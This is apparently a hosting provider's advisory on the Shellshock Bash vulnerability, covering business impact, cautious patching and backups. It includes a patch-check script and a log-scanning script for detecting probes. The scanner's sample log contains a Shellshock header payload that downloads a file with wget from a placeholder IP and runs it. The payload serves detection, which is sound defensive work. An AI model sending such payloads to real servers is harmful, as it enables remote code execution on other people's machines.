The presence of a critical security vulnerability in Bash is now well known, but how are business users of hosting services affected, and what is the appropriate response from providers?
By now you are probably aware of the critical security vulnerability, known as 'Shellshock' or 'Bashdoor' (CVE-2014-6271), discovered in Bash, the default command shell on most Linux distributions and many Unix-derived operating systems. Much has been written already about Shellshock and its potential effects, but what is the impact in the hosting environment and what should hosting providers be doing in response?
Shellshock, the business perspective
As has been written by many, Shellshock is considered even more hazardous than the recent Heartbleed crisis, in which a flaw in the OpenSSL library let attackers read server memory (and with it private keys and session data) over the network. Shellshock goes further: it lets an attacker run arbitrary commands on the affected machine, with the privileges of whichever process handed the hostile input to Bash, so they can do much more than only steal data.
Another factor in the high threat assessment is the potential reach. Bash, the command-processing Unix shell, is the default shell on most Linux distributions and is installed on a great many other Unix-like systems. While these operating systems are not particularly prevalent in home computers, they are extremely common in networking devices (both domestic and commercial) and throughout the datacentre environment, thanks in part to attractive cost positions and historic reliability. Note that many small embedded devices ship a lighter shell such as BusyBox's ash rather than Bash, so each device needs checking rather than assuming.
In fact, it can be said that the majority of the internet is built on Linux. Web, database, DNS, RADIUS and many more integral server types commonly run on operating systems that carry Bash, meaning that many business-critical servers are at risk.
The issue is exacerbated by the fact that many Linux users think of the OS as immune to attack and thus neglect to perform basic security measures.
It's worth mentioning at this point that although Mac OS X machines do carry the vulnerable Bash component, the threat to a typical Mac is low: in its default configuration OS X does not expose Bash to remote input, so only machines running additional UNIX services (a web server with CGI scripts, for example) are at meaningful risk. Also, Bash should not be confused with the Command Prompt synonymous with Windows operating systems; though they look similar, they share no code. Windows itself is, for once, not affected, although a Windows machine with a Bash port such as Cygwin installed would be.
Probable impact of being compromised
The possible uses of the Shellshock vulnerability are wide ranging, but the likely candidates are personal data theft, use in DDoS attack botnets, sending of spam email and attacking more machines via Shellshock. The challenge is that you may not know your machine is compromised: Shellshock gives an attacker command execution with the privileges of the process that ran Bash (often the web server account), and from that foothold a sophisticated criminal can escalate and cover their tracks.
A more recent development has seen exploits like this one being used to turn compromised servers into bitcoin mining rigs. Since mining is extremely resource intensive, it produces sustained high CPU load on the affected machine, which is why it is usually spotted quickly by system administrators who watch their servers' load.
Should we scramble to patch?
Media advice would, on the whole, have us, the hosting provider, and you, the user, scrambling to patch every bit of vulnerable kit we can find as fast as possible. In truth however, this probably isn't the most sensible solution for three reasons:
- The patches released so far have been developed in haste. The first fix for CVE-2014-6271 was quickly shown to be incomplete (the follow-up issue is CVE-2014-7169), and several vendor builds were superseded or withdrawn while more effective solutions were developed. Applying every interim patch to every device as it appears costs time and money; the exception is any internet-facing host that passes request data into Bash (a web server running CGI scripts, for example), which should get whatever fix is current and be patched again when the vendor's follow-up arrives
- In addition, many of the devices that are vulnerable cannot be patched. Mainly this is because the bug has existed in Bash for decades, so it is present in many unsupported or end-of-life products still in service. As a result, patching alone can never offer a complete solution
- A device is only exploitable if an attacker can get data into one of its environment variables before Bash is invoked; the common routes are a CGI script behind a web server, a DHCP client processing a hostile server's options, or an SSH account restricted to a forced command. Many of the un-patchable devices, older printers for example, neither run such services nor need internet access, so the threat to them can be eliminated with proper network security measures.
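One practical way to act on the first point is to test each Bash binary for both the original bug and the hole the hasty first patch left open. The script below is an added example, not code from the original article or from any vendor: it runs the well-known environment-variable checks against a given shell binary (defaulting to whichever bash is on the PATH) and reports whether the build is unpatched, only partially patched, or clean. The function name shellshock_check and the message formats are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original article): check a Bash binary for the
# two Shellshock bugs that the first round of patches did and did not fix.
# Usage: shellshock_check [/path/to/bash]
#   prints one status line; exit 0 = clean, 1 = vulnerable, 2 = could not test

shellshock_check() {
    bash_bin="${1:-bash}"
    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo "missing: $bash_bin not found"
        return 2
    fi

    # CVE-2014-6271: an exported variable holding a function definition may be
    # followed by extra commands, which a vulnerable Bash runs while importing
    # the variable. A vulnerable build prints "vulnerable" before the -c command.
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo test' 2>&1)
    case "$out" in
        *vulnerable*)
            echo "VULNERABLE: CVE-2014-6271 (original bug, unpatched)"
            return 1 ;;
    esac

    # CVE-2014-7169: the first CVE-2014-6271 patch was incomplete and the parser
    # still mishandled some function definitions. The classic test makes an
    # affected build create a file named "echo" in the current directory.
    tmpdir=$(mktemp -d) || return 2
    ( cd "$tmpdir" && env x='() { (a)=>\' "$bash_bin" -c "echo date" >/dev/null 2>&1 ) || true
    if [ -e "$tmpdir/echo" ]; then
        rm -rf "$tmpdir"
        echo "VULNERABLE: CVE-2014-7169 (partial patch only, patch again)"
        return 1
    fi
    rm -rf "$tmpdir"

    echo "patched: $bash_bin does not import trailing commands from the environment"
    return 0
}

# Run against the binary given on the command line, or the default bash.
shellshock_check "${1:-bash}"
```

Run it once per host, and on hosts with more than one Bash (a vendor build in /bin plus a locally compiled one in /usr/local/bin, say) run it against each path; it is the binary that the exposed service actually invokes that matters.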
So, what is the right response?
Our advice to you is to first assess your infrastructure to identify the risks and then build a prioritised plan to protect the business.
Steps we are offering to help all our customers perform include:
- Reviewing network diagrams and testing devices to identify which of them carry a vulnerable Bash and which expose it to untrusted input
- Implementing firewall policies to isolate devices that don't need internet access
- Running anti-virus and anti-malware checks on hosts that were exposed, since a patch closes the door but does not remove anything that already came through it
- Applying stable patches to devices still vulnerable to attack
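The first of those steps also has a detection side: hosts that were exposed will usually show the probes in their web server logs, because an exploit attempt has to place a Bash function definition, the string "() {", into a request header that the CGI handler exports (User-Agent, Referer and Cookie are the usual choices). The script below is an added example, not code from the original article or from any logging product. The four log lines are constructed for illustration (the addresses come from the reserved documentation ranges), and the function names shellshock_probes and count_probe_sources are this example's own.

```shell
#!/bin/sh
# Added example (not from the original article): flag Shellshock probe attempts
# in an Apache/nginx "combined"-format access log. An exploit attempt has to put
# a Bash function definition, "() {", into a request field that the CGI
# handler exports into the environment (User-Agent, Referer, Cookie ...).

# Constructed sample log (four lines, two of them probes from one source).
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.99/x -O /tmp/x; sh /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "http://example.com/" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { :;}; ping -c 1 203.0.113.99" "curl/7.30"
192.0.2.44 - - [25/Sep/2014:10:13:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux)"'

# shellshock_probes: read a log on stdin and print "client-ip request-path"
# for every line containing a function-definition prefix. The pattern allows
# "(){" as well as "() {" so trivial whitespace variations are not missed.
shellshock_probes() {
    awk '
        /\(\)[[:space:]]*[{]/ {
            # $1 is the client address; the request path follows the method
            # inside the first quoted string of the line.
            match($0, /"[A-Z]+ [^ ]+/)
            path = substr($0, RSTART, RLENGTH)
            sub(/^"[A-Z]+ /, "", path)
            print $1, path
        }'
}

# count_probe_sources: how many probe lines each client sent, busiest first,
# which is the list to feed into a firewall block and an abuse report.
count_probe_sources() {
    shellshock_probes | awk '{ c[$1]++ } END { for (ip in c) print c[ip], ip }' | sort -rn
}

printf '%s\n' "$SAMPLE_LOG" | shellshock_probes
printf '%s\n' "$SAMPLE_LOG" | count_probe_sources
```

A hit in the log does not by itself mean the host was compromised; it means someone tried, so that host goes to the front of the patch-and-verify queue and its outbound connections from around the timestamp deserve a look. Against a real server, feed the access log in place of the sample ("shellshock_probes < /var/log/apache2/access.log").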
As always, backup is your trump card
As it is in most situations, having an appropriate backup strategy in place ensures that, even if the worst happens, you can recover critical data and resume operations quickly. Keep at least one copy somewhere a compromised host cannot reach or overwrite, because an attacker with command execution on the server can delete or corrupt any backup that server can write to. If you don't have a backup strategy, you really are leaving yourself vulnerable to significant disruption from hackers exploiting security holes like Shellshock.